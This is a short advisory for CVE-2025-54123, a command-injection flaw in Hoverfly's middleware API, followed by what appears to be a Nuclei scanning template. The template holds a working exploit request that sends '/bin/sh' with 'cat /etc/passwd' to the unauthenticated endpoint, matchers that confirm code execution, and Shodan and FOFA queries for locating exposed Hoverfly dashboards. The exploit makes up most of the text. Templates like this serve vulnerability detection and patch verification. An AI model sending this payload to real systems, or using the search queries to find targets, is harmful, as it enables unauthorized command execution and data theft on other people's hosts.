Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
PoC代码[已公开]
id: CVE-2025-54123
info:
name: Hoverfly <= 1.11.3 - Remote Code Execution
author: nukunga[seonghyeonJeon]
severity: critical
description: |
Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
reference:
- https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
- https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
metadata:
verified: true
max-requests: 1
shodan-query:
- http.favicon.hash:1357234275
- title:"Hoverfly Dashboard"
fofa-query:
- icon_hash="1357234275"
- title="Hoverfly Dashboard"
tags: cve,cve2025,hoverfly,rce,intrusive,vuln,vkev
http:
- raw:
- |
PUT /api/v2/hoverfly/middleware HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"binary": "/bin/sh",
"script": "cat /etc/passwd"
}
matchers:
- type: dsl
dsl:
- "status_code == 422"
- "regex('root:x:0:0', body)"
- "contains_all(body, 'STDOUT:','hoverfly')"
condition: and
# digest: 490a0046304402207aea6e1391e0e30202a15308b6de7eb94bdf6f222d448496a07babfdb8393270022055cc6cc38ef502848f85f7967f144728eda8c8cf8bb388c390c3151728c3e995:922c64590222798bb761d5b6d8e72950